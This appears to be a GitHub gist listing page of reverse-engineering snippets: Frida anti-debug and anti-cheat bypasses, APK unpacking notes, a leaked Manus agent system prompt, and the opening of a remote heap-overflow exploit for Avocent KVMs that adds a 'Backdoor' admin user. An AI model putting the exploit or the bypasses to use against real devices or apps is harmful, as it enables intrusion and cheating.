ApkUnpacker apkunpacker
@apkunpacker
apkunpacker / uncrackable_syscalls_4.ts
Created May 15, 2025 01:58 — forked from r3bb1t/uncrackable_syscalls_4.ts
Frida script for bypassing direct syscalls in uncrackable 4
class AntiAntiDebugV2 {
    readonly fakeMapsFile: string;
    /// This will be used for redirecting syscalls which are trying to open /proc/self/maps
    readonly fakeMapsFileNamePtr: NativePointer;
    readonly fridaRegex: RegExp;
    readonly procSelfTaskStatusRe: RegExp;
    readonly fakeFilePath: string;
    readonly fakeFilePathPtr: NativePointer;
@apkunpacker
apkunpacker / agent loop
Created March 11, 2025 08:03 — forked from jlia0/agent loop
Manus tools and prompts
You are Manus, an AI agent created by the Manus team.
You excel at the following tasks:
1. Information gathering, fact-checking, and documentation
2. Data processing, analysis, and visualization
3. Writing multi-chapter articles and in-depth research reports
4. Creating websites, applications, and tools
5. Using programming to solve various problems beyond development
6. Various tasks that can be accomplished using computers and the internet
@apkunpacker
apkunpacker / pairip_analysis.js
Created March 4, 2025 01:25 — forked from Ahmeth4n/pairip_analysis.js
simple PairIP executeVM() analyzer frida script.
function hookNative() {
    const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad");
    if (!jniOnLoad) {
        console.log("[-] JNI_OnLoad not found!");
        return;
    }
    console.log("[+] JNI_OnLoad founded:", jniOnLoad);
@apkunpacker
apkunpacker / xcode-uninstall.sh
Created October 22, 2024 15:25 — forked from oxlb/xcode-uninstall.sh
SH file to uninstall Xcode from MacOS
killall Xcode
xcrun -k
xcodebuild -alltargets clean
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang/ModuleCache"
rm -rf "$(getconf DARWIN_USER_CACHE_DIR)/org.llvm.clang.$(whoami)/ModuleCache"
rm -rf /Applications/Xcode.app
rm -rf ~/Library/Caches/com.apple.dt.Xcode
rm -rf ~/Library/Developer
rm -rf ~/Library/MobileDevice
rm -rf ~/Library/Preferences/com.apple.dt.Xcode.plist

Zimperium zShield RE Notes

Newer versions of the Rabbit R1's APK are protected by https://www.zimperium.com/zshield/ (I don't know this for certain, somebody told me it is but I haven't really seen any identifying marks in the code yet)

Interesting assets within the APK:

lib/arm64-v8a/liboptipkawfn.so    ~3MB packed/encrypted ELF
assets/optipkawfn/0.odex          only 41 bytes (EDIT: I think this is part of an asset obfuscation scheme, the real file contents are likely elsewhere - inside the .szip maybe?)
assets/optipkawfn.szip ~8MB - I predict containing encrypted+compressed bytecode
@apkunpacker
apkunpacker / guide.md
Created July 26, 2024 15:00 — forked from miticollo/build_frida.sh
How to build Frida (≥ 16.2.2) for iOS jailbroken devices

Here, I'll show you how to compile Frida (≥ 16.2.2) for both rootfull and rootless jailbreaks.

Old Instructions

If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.

Build Instructions

Requirements

@apkunpacker
apkunpacker / index.ts
Created July 14, 2024 13:54 — forked from commonuserlol/index.ts
ACTk ObscuredTypes hax with frida; tested on 2.0.2
import "frida-il2cpp-bridge";
function main() {
    const AssemblyCSharp = Il2Cpp.domain.assembly("Assembly-CSharp").image;
    // Note that on versions older than 2.x.y this isn't needed
    // Since ACTk bundled directly into Assembly-CSharp
    const ACTk_Runtime = Il2Cpp.domain.assembly("ACTk.Runtime").image;
    // Target class
    const PlayerData = AssemblyCSharp.class("PlayerData");

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF) is the default binary format on Linux-based systems.

ELF

Compilation

@apkunpacker
apkunpacker / asmpwn.py
Created December 9, 2023 06:59 — forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
    global socks # python closes out of scope sockets
    port = 3211 # this is hardcoded in the binary
    print(f"[*] Exploiting ASMP on {hostname} port {port}")